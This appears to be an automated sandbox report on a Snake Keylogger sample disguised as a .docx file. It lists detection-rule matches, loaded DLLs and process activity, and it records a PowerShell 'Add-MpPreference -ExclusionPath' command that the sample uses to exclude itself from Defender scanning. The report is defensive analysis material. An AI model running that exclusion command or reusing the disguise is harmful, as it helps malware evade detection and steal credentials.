                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1736037299.0000000007522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1736037299.0000000007522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002BE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1739515757.000000000B580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.0000000003971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162422602.0000000001377000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeBinary or memory string: OriginalFilenameIecr.exe: vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@3/3
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1xyklf3.dpw.ps1Jump to behavior
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeVirustotal: Detection: 30%
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess created: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Iecr.pdb source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: Binary string: Iecr.pdbSHA256 source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C31710 push ss; ret 0_2_05C316D3
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C34F7A pushad ; iretd 0_2_05C34F81
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C348E0 pushad ; retf 0_2_05C348E1
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C34848 push eax; retf 0_2_05C34849
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C3BA98 push esp; iretd 0_2_05C3BAA5
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774DDE0 push eax; retf 0_2_0774DDE1
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE9C30 push esp; retf 0305h3_2_02FE9D55
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE2398 push edi; ret 3_2_02FE23BE
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F81FD0 push FFFFFFC2h; retn 000Ch3_2_06F81FF3
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8ACC9 push es; ret 3_2_06F8ACD4
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8E8FA push es; ret 3_2_06F8E934
